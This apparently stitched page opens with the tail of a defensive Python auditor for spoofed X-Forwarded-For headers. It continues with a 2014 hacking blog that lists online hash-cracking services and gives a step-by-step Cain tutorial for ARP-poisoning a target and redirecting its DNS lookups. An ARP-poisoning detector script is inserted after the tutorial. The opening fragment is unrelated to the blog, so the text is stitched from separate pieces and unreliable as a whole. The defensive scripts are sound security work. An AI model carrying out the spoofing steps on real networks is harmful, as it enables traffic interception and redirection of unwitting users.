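    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_trusted_peer(peer):
    """True if the TCP peer is inside the proxy range allowed to set X-Forwarded-For."""
    try:
        addr = ipaddress.ip_address(peer)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXIES)


def findings(line):
    """Return the list of issues found in one log line (an empty list means clean)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparseable_line"]
    out = []
    method = rec["request"].split(" ", 1)[0].upper()
    if method == "TRACE":
        out.append("trace_method")  # TRACE echoes proxy-added headers back to the sender
    xff = rec["xff"]
    has_xff = xff not in ("", "-")
    if has_xff and not is_trusted_peer(rec["peer"]):
        out.append("xff_from_untrusted_peer")  # header supplied on a direct-to-origin connection
    if has_xff:
        if ESCAPED_CONTROL.search(xff):
            out.append("xff_control_char")  # e.g. a NUL byte meant to truncate the logged value
        for entry in xff.split(","):
            try:
                ipaddress.ip_address(entry.strip())
            except ValueError:
                out.append("xff_not_an_ip")
                break
    if rec["status"] == "400" and not has_xff:
        out.append("400_without_xff")  # only the %a field identifies the sender here
    return out


def audit(lines):
    """Map line index -> findings for every line that has at least one finding."""
    report = {}
    for i, line in enumerate(lines):
        hits = findings(line)
        if hits:
            report[i] = hits
    return report


if __name__ == "__main__":
    for idx, hits in audit(SAMPLE_LOG).items():
        print(idx, hits, SAMPLE_LOG[idx])
```

Because %a is recorded by the server itself, the 400 line still names the peer that sent the malformed request, and the line whose peer is outside the proxy range is the direct-to-origin case the post describes: that is the one to alert on regardless of what X-Forwarded-For claims.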


Wednesday, 7 May 2014

online hash crackers

only for educational purpose:-

Cracker                 Hashes
Tobtu                   50,529,455,839
TMTO                    36,436,233,567
MD5Decrypter(uk)        8,700,000,000
OnlineHashCrack         5,211,644,250
AuthSecu                500,000,000
MD5th                   400,000,000
NetMD5crack             171,392,210
Kalkulators             100,000,000
Rednoize                76,834,449
Gromweb                 45,543,530
hash-cracker.com        40,000,000
Crackfoo -NNC           38,227,555
MD5Rainbow              33,517,066
Digitalsun              31,000,000
Sans                    20,264,963
Crackfor.me             16,173,854
MD5-lookup              8,796,772
MD5decrypter            8,103,123
MD5-db                  5,500,000
MD5-decrypter           3,400,000
HashCracking.ru         3,585,150
Shalla                  2,218,319
Hash-Database           1,635,062
MD5decryption           1,300,000
Drasen                  568,064
MD5finder               429,477
MD5pass                 327,497
Bokehman                230,000
Shell-Storm             154,994
Appspot                 Multi
Noisette                Multi
MD5crack                Multi
Kinginfet               Multi
VHCTeam                 ?
Longgie                 ?
RAH-Labs                ?
Wordd                   ?
Anqel                   ?
CMD5                    ?
web-security-services   ?
MD5online               ?
MD5.my-addr             ?
C0llision               ?
MD5hood                 ?
Schwett                 ?
TheKaine                ?
Fox21                   ?

NTLM
Cracker                 Hashes
MD5decrypter(uk)        8,700,000,000
OnlineHashCrack         5,211,644,250
hash-cracker.com        40,000,000
Fox21                   ?
LMCrack                 ?
CMD5                    ?

LM
Cracker                 Hashes
OnlineHashCrack         5,211,644,250
NiceNameCrew            ?
C0llision               ?
Fox21                   ?

SHA1
Cracker                 Hashes
MD5Decrypter(uk)        8,700,000,000
Rednoize                76,838,852
hash-cracker.com        40,000,000
Sans                    20,264,963
SHA1-Lookup             18,949,380
HashCracking.ru         3,585,150
Hash-Database           1,635,065
CMD5                    ?
StringFunction          ?
Web-Security-Services   ?

SHA256-512
Cracker                 Hashes
Hash-Database           1,635,067
Shalla                  1,143,472

MySQL
Cracker                 Hashes
OnlineHashCrack         5,211,644,250
Hashcrack               30,654,899
HashCracking.ru         3,585,150
CMD5                    ?

Tuesday, 6 May 2014

HOW TO DO DNS SPOOF(TUTORIAL)?




only for educational purpose:-


First, what is DNS?

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with the domain names assigned to each participant. For example, http://www.example.com translates to 208.77.188.166.

What does poisoning the DNS allow us to do?

It allows us to redirect the traffic to another website.
This is the structure of the network:

[Figure: DNS-SPOOF network diagram]

1, 2 and 3 are computers.
1 is the computer acting as the gateway (it could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker, using Cain
Note: the IPs are chosen at random for this tutorial.
Our work is on computer number 3:
1- After you install Cain, open it and go to the Sniffer tab.
2- Click on Configure and choose your adapter.
3- Enable the sniffer (click on the second icon in the toolbar, next to the Open icon).
4- Right-click in the empty area and choose Scan MAC Addresses. We get the results shown above.
5- Click on the APR tab.
6- Click on the + sign in the toolbar to add a new ARP poison routing.
7- Choose the gateway, which is 172.128.254.1; in the next list you'll get the IP of computer 2, which is 172.128.254.10, and click OK.
8- Now click on the APR-DNS tab.
9- Click on the + sign.
10- Enter the web address that you want to spoof (in this case, when the user goes to facebook he'll be redirected to myspace), click on Resolve, type the web address that you want to redirect the user to, and click OK; you'll get the IP of that web address, then click OK.
11- Now, to make this work, we have to enable APR poisoning: click on the icon next to the sniffer icon, and everything should work as we expect.

Now computer 2 will have its routes poisoned, and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com.

Now imagine what else you can do with this technique.
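The tutorial is written from the attacker's seat on computer 3. What the defender on computer 2 can watch for is the side effect of step 11: after APR poisoning is enabled, the target's ARP table maps the gateway's IP 172.128.254.1 to the attacker's MAC, so the gateway's MAC changes and two IPs end up sharing one MAC. The following Python script is an added example and not part of the original tutorial; it parses neighbour-table lines in the format printed by Linux `ip neigh` (assumed), compares the gateway entry against a MAC pinned on a known-clean network, and flags any MAC that answers for more than one IP. The MAC addresses and the attacker's address 172.128.254.20 are constructed for the sample.

```python
import re
from collections import defaultdict

# Neighbour-table line as printed by `ip neigh show` on Linux (assumed format):
#   172.128.254.1 dev eth0 lladdr 00:50:56:aa:bb:01 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) lladdr "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}) (?P<state>\S+)$"
)

# Constructed sample: what computer 2 (172.128.254.10) sees before the attack.
# The attacker (computer 3) is given the hypothetical address 172.128.254.20.
CLEAN_TABLE = """\
172.128.254.1 dev eth0 lladdr 00:50:56:aa:bb:01 REACHABLE
172.128.254.20 dev eth0 lladdr 00:50:56:aa:bb:20 STALE
"""

# Constructed sample: the same table after step 11 (APR poisoning enabled).
# The gateway's IP now resolves to the attacker's MAC.
POISONED_TABLE = """\
172.128.254.1 dev eth0 lladdr 00:50:56:aa:bb:20 REACHABLE
172.128.254.20 dev eth0 lladdr 00:50:56:aa:bb:20 STALE
"""

GATEWAY_IP = "172.128.254.1"
PINNED_GATEWAY_MAC = "00:50:56:aa:bb:01"  # recorded once, on a known-clean network


def parse_neigh(text):
    """Return {ip: mac} for every parseable line. Entries without an lladdr
    (FAILED / INCOMPLETE) carry no MAC and are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def check_arp_table(table, gateway_ip, pinned_mac):
    """Return a list of alerts; an empty list means nothing suspicious."""
    alerts = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None and gw_mac != pinned_mac.lower():
        # The gateway IP is being answered by a different interface than the one we pinned.
        alerts.append(("gateway_mac_changed", gw_mac))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            # One MAC answering for several IPs is the usual ARP-poisoning footprint:
            # the attacker's interface now claims the gateway's address as well as its own.
            alerts.append(("duplicate_mac", mac, sorted(ips)))
    return alerts


if __name__ == "__main__":
    for name, text in (("clean", CLEAN_TABLE), ("poisoned", POISONED_TABLE)):
        print(name, check_arp_table(parse_neigh(text), GATEWAY_IP, PINNED_GATEWAY_MAC))
```

On a real host the same check can be run periodically against the live output of `ip neigh`; a static ARP entry for the gateway on the client, Dynamic ARP Inspection on the switch, and HTTPS with HSTS (so a redirect to a different site fails the certificate check) are the standard ways to blunt the redirect described in the tutorial.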





about this blog


This blog is for educational purposes only. Hacking is a crime, but using its knowledge for good purposes is not a crime.

Here you will find all the tricks and much more of the knowledge you need, and many more things, at this blog.



by:pavan joshi

© 2013 computer tips and tricks with pavan joshi.